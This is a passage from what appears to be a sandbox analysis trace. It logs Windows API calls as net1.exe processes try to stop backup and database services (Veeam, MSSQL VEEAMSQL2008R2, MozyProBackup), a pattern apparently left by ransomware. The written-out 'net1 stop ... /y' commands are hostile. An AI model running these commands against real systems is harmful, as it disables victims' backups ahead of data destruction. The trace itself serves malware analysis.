lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0114.653] GetFileType (hFile=0x0) returned 0x0 [0114.654] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7061a0 [0114.654] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7061a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0114.654] WriteFile (in: hFile=0x0, lpBuffer=0x7061a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ff610, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff610, lpOverlapped=0x0) returned 0 [0114.654] LocalFree (hMem=0x7061a0) returned 0x0 [0114.654] GetFileType (hFile=0x0) returned 0x0 [0114.654] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7061a0 [0114.654] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7061a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0114.654] WriteFile (in: hFile=0x0, lpBuffer=0x7061a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff610, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff610, lpOverlapped=0x0) returned 0 [0114.654] LocalFree (hMem=0x7061a0) returned 0x0 [0114.654] NetApiBufferFree (Buffer=0x701b00) returned 0x0 [0114.654] NetApiBufferFree (Buffer=0x701b18) returned 0x0 [0114.654] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0114.654] exit (_Code=2) Process: id = "174" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0xd53d000" os_pid = "0x11e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xe64" cmd_line = "C:\\Windows\\system32\\net1 stop veeam /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 561 os_tid = 0x11ec [0114.491] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa6c | out: lpSystemTimeAsFileTime=0x16fa6c*(dwLowDateTime=0x18005390, dwHighDateTime=0x1d6f0d1)) [0114.491] GetCurrentProcessId () returned 0x11e8 [0114.491] GetCurrentThreadId () returned 0x11ec [0114.491] GetTickCount () returned 0x114ff08 [0114.491] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa64 | out: lpPerformanceCount=0x16fa64*=23359221610) returned 1 [0114.628] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0114.628] __set_app_type (_Type=0x1) [0114.628] __p__fmode () returned 0x770331f4 [0114.628] __p__commode () returned 0x770331fc [0114.628] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0114.628] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0114.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.628] GetConsoleOutputCP () returned 0x1b5 [0114.629] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0114.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.632] sprintf_s (in: _DstBuf=0x16fa24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.632] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0114.634] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.634] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop veeam /y" [0114.634] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0114.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5e) returned 0x603ac8 [0114.635] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.635] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f9f4 | out: Buffer=0x16f9f4*=0x601ad0) returned 0x0 [0114.635] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f9f4 | out: Buffer=0x16f9f4*=0x601ae8) returned 0x0 [0114.635] _fileno (_File=0x77032900) returned -2 [0114.635] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0114.635] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.635] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.635] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.635] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.635] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.635] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.635] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.635] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.635] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.635] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.635] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.635] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.635] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.635] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.635] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.635] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.636] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.636] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.636] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.636] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.636] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.636] _wcsicmp (_String1="accounts", _String2="veeam") returned -21 [0114.636] _wcsicmp (_String1="computer", _String2="veeam") returned -19 [0114.636] _wcsicmp (_String1="config", _String2="veeam") returned -19 [0114.636] _wcsicmp (_String1="continue", _String2="veeam") returned -19 [0114.636] _wcsicmp (_String1="cont", _String2="veeam") returned -19 [0114.636] _wcsicmp (_String1="file", _String2="veeam") returned -16 [0114.636] _wcsicmp (_String1="files", _String2="veeam") returned -16 [0114.636] _wcsicmp (_String1="group", _String2="veeam") returned -15 [0114.636] _wcsicmp (_String1="groups", _String2="veeam") returned -15 [0114.636] _wcsicmp (_String1="help", _String2="veeam") returned -14 [0114.636] _wcsicmp (_String1="helpmsg", _String2="veeam") returned -14 [0114.636] _wcsicmp (_String1="localgroup", _String2="veeam") returned -10 [0114.636] _wcsicmp (_String1="pause", _String2="veeam") returned -6 [0114.636] _wcsicmp (_String1="session", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="sessions", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="sess", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="share", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="start", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="stats", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="statistics", _String2="veeam") returned -3 [0114.636] _wcsicmp (_String1="stop", _String2="veeam") returned -3 [0114.637] _wcsicmp (_String1="time", _String2="veeam") returned -2 [0114.637] _wcsicmp (_String1="user", _String2="veeam") returned -1 [0114.637] _wcsicmp (_String1="users", _String2="veeam") returned -1 [0114.637] _wcsicmp (_String1="msg", _String2="veeam") returned -9 [0114.637] _wcsicmp (_String1="messenger", _String2="veeam") returned -9 [0114.637] _wcsicmp (_String1="receiver", _String2="veeam") returned -4 [0114.637] _wcsicmp (_String1="rcv", _String2="veeam") returned -4 [0114.637] _wcsicmp (_String1="netpopup", _String2="veeam") returned -8 [0114.637] _wcsicmp (_String1="redirector", _String2="veeam") returned -4 [0114.637] _wcsicmp (_String1="redir", _String2="veeam") returned -4 [0114.637] _wcsicmp (_String1="rdr", _String2="veeam") returned -4 [0114.637] _wcsicmp (_String1="workstation", _String2="veeam") returned 1 [0114.637] _wcsicmp (_String1="work", _String2="veeam") returned 1 [0114.637] _wcsicmp (_String1="wksta", _String2="veeam") returned 1 [0114.637] _wcsicmp (_String1="prdr", _String2="veeam") returned -6 [0114.637] _wcsicmp (_String1="devrdr", _String2="veeam") returned -18 [0114.637] _wcsicmp (_String1="lanmanworkstation", _String2="veeam") returned -10 [0114.637] _wcsicmp (_String1="server", _String2="veeam") returned -3 [0114.637] _wcsicmp (_String1="svr", _String2="veeam") returned -3 [0114.637] _wcsicmp (_String1="srv", _String2="veeam") returned -3 [0114.637] _wcsicmp (_String1="lanmanserver", _String2="veeam") returned -10 [0114.637] _wcsicmp (_String1="alerter", _String2="veeam") returned -21 [0114.637] _wcsicmp (_String1="netlogon", _String2="veeam") returned -8 [0114.637] _wcsupr (in: _String="veeam" | out: _String="VEEAM") returned="VEEAM" [0114.638] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x605488 [0114.641] GetServiceKeyNameW (in: hSCManager=0x605488, lpDisplayName="VEEAM", lpServiceName=0x39aaf0, lpcchBuffer=0x16f990 | out: lpServiceName="", lpcchBuffer=0x16f990) returned 0 [0114.642] _wcsicmp (_String1="msg", _String2="VEEAM") returned -9 [0114.642] _wcsicmp (_String1="messenger", _String2="VEEAM") returned -9 [0114.642] _wcsicmp (_String1="receiver", _String2="VEEAM") returned -4 [0114.642] _wcsicmp (_String1="rcv", _String2="VEEAM") returned -4 [0114.642] _wcsicmp (_String1="redirector", _String2="VEEAM") returned -4 [0114.642] _wcsicmp (_String1="redir", _String2="VEEAM") returned -4 [0114.642] _wcsicmp (_String1="rdr", _String2="VEEAM") returned -4 [0114.642] _wcsicmp (_String1="workstation", _String2="VEEAM") returned 1 [0114.642] _wcsicmp (_String1="work", _String2="VEEAM") returned 1 [0114.642] _wcsicmp (_String1="wksta", _String2="VEEAM") returned 1 [0114.642] _wcsicmp (_String1="prdr", _String2="VEEAM") returned -6 [0114.642] _wcsicmp (_String1="devrdr", _String2="VEEAM") returned -18 [0114.642] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAM") returned -10 [0114.642] _wcsicmp (_String1="server", _String2="VEEAM") returned -3 [0114.642] _wcsicmp (_String1="svr", _String2="VEEAM") returned -3 [0114.642] _wcsicmp (_String1="srv", _String2="VEEAM") returned -3 [0114.642] _wcsicmp (_String1="lanmanserver", _String2="VEEAM") returned -10 [0114.642] _wcsicmp (_String1="alerter", _String2="VEEAM") returned -21 [0114.642] _wcsicmp (_String1="netlogon", _String2="VEEAM") returned -8 [0114.642] NetServiceControl (in: servername=0x0, service="VEEAM", opcode=0x0, arg=0x0, bufptr=0x16f98c | out: bufptr=0x16f98c) returned 0x889 [0114.643] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.644] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0114.644] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0114.646] GetFileType (hFile=0x0) returned 0x0 [0114.646] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x603ea8 [0114.646] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x603ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0114.646] WriteFile (in: hFile=0x0, lpBuffer=0x603ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f8cc, lpOverlapped=0x0) returned 0 [0114.646] LocalFree (hMem=0x603ea8) returned 0x0 [0114.646] GetFileType (hFile=0x0) returned 0x0 [0114.646] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x606150 [0114.646] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x606150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0114.646] WriteFile (in: hFile=0x0, lpBuffer=0x606150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f8cc, lpOverlapped=0x0) returned 0 [0114.646] LocalFree (hMem=0x606150) returned 0x0 [0114.646] _ultow (in: _Dest=0x889, _Radix=1505532 | out: _Dest=0x889) returned="2185" [0114.646] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0114.646] GetFileType (hFile=0x0) returned 0x0 [0114.647] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x606150 [0114.647] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x606150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0114.647] WriteFile (in: hFile=0x0, lpBuffer=0x606150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f8d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f8d8, lpOverlapped=0x0) returned 0 [0114.647] LocalFree (hMem=0x606150) returned 0x0 [0114.647] GetFileType (hFile=0x0) returned 0x0 [0114.647] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x606150 [0114.647] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x606150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0114.647] WriteFile (in: hFile=0x0, lpBuffer=0x606150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f8d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f8d8, lpOverlapped=0x0) returned 0 [0114.647] LocalFree (hMem=0x606150) returned 0x0 [0114.648] NetApiBufferFree (Buffer=0x601ad0) returned 0x0 [0114.648] NetApiBufferFree (Buffer=0x601ae8) returned 0x0 [0114.648] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop veeam /y" [0114.648] exit (_Code=2) Process: id = "175" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6e141000" os_pid = "0x11f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xdac" cmd_line = "C:\\Windows\\system32\\net1 stop mozyprobackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 562 os_tid = 0x11f4 [0113.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35ff1c | out: lpSystemTimeAsFileTime=0x35ff1c*(dwLowDateTime=0x17502dd0, dwHighDateTime=0x1d6f0d1)) [0113.343] GetCurrentProcessId () returned 0x11f0 [0113.343] GetCurrentThreadId () returned 0x11f4 [0113.343] GetTickCount () returned 0x114fa85 [0113.343] QueryPerformanceCounter (in: lpPerformanceCount=0x35ff14 | out: lpPerformanceCount=0x35ff14*=23244384281) returned 1 [0113.343] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0113.343] __set_app_type (_Type=0x1) [0113.343] __p__fmode () returned 0x770331f4 [0113.343] __p__commode () returned 0x770331fc [0113.344] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0113.344] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0113.344] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.344] GetConsoleOutputCP () returned 0x1b5 [0113.344] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0113.344] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.348] sprintf_s (in: _DstBuf=0x35fed4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.348] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0113.607] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.607] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mozyprobackup /y" [0113.607] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fca0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0113.607] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x6e) returned 0x743ae0 [0113.607] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.607] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fea4 | out: Buffer=0x35fea4*=0x741ae8) returned 0x0 [0113.607] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fea4 | out: Buffer=0x35fea4*=0x741b00) returned 0x0 [0113.607] _fileno (_File=0x77032900) returned -2 [0113.608] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0113.608] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.608] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.608] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.608] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.608] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.608] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.608] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.608] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.608] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.608] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.608] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.608] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.608] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.608] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.608] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.608] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.608] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.608] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.608] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.608] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.608] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.609] _wcsicmp (_String1="accounts", _String2="mozyprobackup") returned -12 [0113.609] _wcsicmp (_String1="computer", _String2="mozyprobackup") returned -10 [0113.609] _wcsicmp (_String1="config", _String2="mozyprobackup") returned -10 [0113.609] _wcsicmp (_String1="continue", _String2="mozyprobackup") returned -10 [0113.609] _wcsicmp (_String1="cont", _String2="mozyprobackup") returned -10 [0113.609] _wcsicmp (_String1="file", _String2="mozyprobackup") returned -7 [0113.609] _wcsicmp (_String1="files", _String2="mozyprobackup") returned -7 [0113.609] _wcsicmp (_String1="group", _String2="mozyprobackup") returned -6 [0113.609] _wcsicmp (_String1="groups", _String2="mozyprobackup") returned -6 [0113.609] _wcsicmp (_String1="help", _String2="mozyprobackup") returned -5 [0113.609] _wcsicmp (_String1="helpmsg", _String2="mozyprobackup") returned -5 [0113.609] _wcsicmp (_String1="localgroup", _String2="mozyprobackup") returned -1 [0113.609] _wcsicmp (_String1="pause", _String2="mozyprobackup") returned 3 [0113.609] _wcsicmp (_String1="session", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="sessions", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="sess", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="share", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="start", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="stats", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="statistics", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="stop", _String2="mozyprobackup") returned 6 [0113.609] _wcsicmp (_String1="time", _String2="mozyprobackup") returned 7 [0113.609] _wcsicmp (_String1="user", _String2="mozyprobackup") returned 8 [0113.609] _wcsicmp (_String1="users", _String2="mozyprobackup") returned 8 [0113.609] _wcsicmp (_String1="msg", _String2="mozyprobackup") returned 4 [0113.610] _wcsicmp (_String1="messenger", _String2="mozyprobackup") returned -10 [0113.610] _wcsicmp (_String1="receiver", _String2="mozyprobackup") returned 5 [0113.610] _wcsicmp (_String1="rcv", _String2="mozyprobackup") returned 5 [0113.610] _wcsicmp (_String1="netpopup", _String2="mozyprobackup") returned 1 [0113.610] _wcsicmp (_String1="redirector", _String2="mozyprobackup") returned 5 [0113.610] _wcsicmp (_String1="redir", _String2="mozyprobackup") returned 5 [0113.610] _wcsicmp (_String1="rdr", _String2="mozyprobackup") returned 5 [0113.610] _wcsicmp (_String1="workstation", _String2="mozyprobackup") returned 10 [0113.610] _wcsicmp (_String1="work", _String2="mozyprobackup") returned 10 [0113.610] _wcsicmp (_String1="wksta", _String2="mozyprobackup") returned 10 [0113.610] _wcsicmp (_String1="prdr", _String2="mozyprobackup") returned 3 [0113.610] _wcsicmp (_String1="devrdr", _String2="mozyprobackup") returned -9 [0113.610] _wcsicmp (_String1="lanmanworkstation", _String2="mozyprobackup") returned -1 [0113.610] _wcsicmp (_String1="server", _String2="mozyprobackup") returned 6 [0113.610] _wcsicmp (_String1="svr", _String2="mozyprobackup") returned 6 [0113.610] _wcsicmp (_String1="srv", _String2="mozyprobackup") returned 6 [0113.610] _wcsicmp (_String1="lanmanserver", _String2="mozyprobackup") returned -1 [0113.610] _wcsicmp (_String1="alerter", _String2="mozyprobackup") returned -12 [0113.610] _wcsicmp (_String1="netlogon", _String2="mozyprobackup") returned 1 [0113.610] _wcsupr (in: _String="mozyprobackup" | out: _String="MOZYPROBACKUP") returned="MOZYPROBACKUP" [0113.611] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454b0 [0113.728] GetServiceKeyNameW (in: hSCManager=0x7454b0, lpDisplayName="MOZYPROBACKUP", lpServiceName=0x39aaf0, lpcchBuffer=0x35fe40 | out: lpServiceName="", lpcchBuffer=0x35fe40) returned 0 [0113.731] _wcsicmp (_String1="msg", _String2="MOZYPROBACKUP") returned 4 [0113.731] _wcsicmp (_String1="messenger", _String2="MOZYPROBACKUP") returned -10 [0113.731] _wcsicmp (_String1="receiver", _String2="MOZYPROBACKUP") returned 5 [0113.731] _wcsicmp (_String1="rcv", _String2="MOZYPROBACKUP") returned 5 [0113.731] _wcsicmp (_String1="redirector", _String2="MOZYPROBACKUP") returned 5 [0113.731] _wcsicmp (_String1="redir", _String2="MOZYPROBACKUP") returned 5 [0113.731] _wcsicmp (_String1="rdr", _String2="MOZYPROBACKUP") returned 5 [0113.731] _wcsicmp (_String1="workstation", _String2="MOZYPROBACKUP") returned 10 [0113.731] _wcsicmp (_String1="work", _String2="MOZYPROBACKUP") returned 10 [0113.731] _wcsicmp (_String1="wksta", _String2="MOZYPROBACKUP") returned 10 [0113.731] _wcsicmp (_String1="prdr", _String2="MOZYPROBACKUP") returned 3 [0113.731] _wcsicmp (_String1="devrdr", _String2="MOZYPROBACKUP") returned -9 [0113.731] _wcsicmp (_String1="lanmanworkstation", _String2="MOZYPROBACKUP") returned -1 [0113.731] _wcsicmp (_String1="server", _String2="MOZYPROBACKUP") returned 6 [0113.731] _wcsicmp (_String1="svr", _String2="MOZYPROBACKUP") returned 6 [0113.732] _wcsicmp (_String1="srv", _String2="MOZYPROBACKUP") returned 6 [0113.732] _wcsicmp (_String1="lanmanserver", _String2="MOZYPROBACKUP") returned -1 [0113.732] _wcsicmp (_String1="alerter", _String2="MOZYPROBACKUP") returned -12 [0113.732] _wcsicmp (_String1="netlogon", _String2="MOZYPROBACKUP") returned 1 [0113.732] NetServiceControl (in: servername=0x0, service="MOZYPROBACKUP", opcode=0x0, arg=0x0, bufptr=0x35fe3c | out: bufptr=0x35fe3c) returned 0x889 [0113.745] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.746] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0113.748] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.749] GetFileType (hFile=0x0) returned 0x0 [0113.749] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x743ed0 [0113.749] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x743ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0113.749] WriteFile (in: hFile=0x0, lpBuffer=0x743ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fd7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd7c, lpOverlapped=0x0) returned 0 [0113.749] LocalFree (hMem=0x743ed0) returned 0x0 [0113.749] GetFileType (hFile=0x0) returned 0x0 [0113.749] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746178 [0113.749] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0113.749] WriteFile (in: hFile=0x0, lpBuffer=0x746178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fd7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd7c, lpOverlapped=0x0) returned 0 [0113.749] LocalFree (hMem=0x746178) returned 0x0 [0113.750] _ultow (in: _Dest=0x889, _Radix=3538348 | out: _Dest=0x889) returned="2185" [0113.750] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.750] GetFileType (hFile=0x0) returned 0x0 [0113.750] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x746178 [0113.750] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x746178, cbMultiByte=104, lpDefaultChar=0x0, 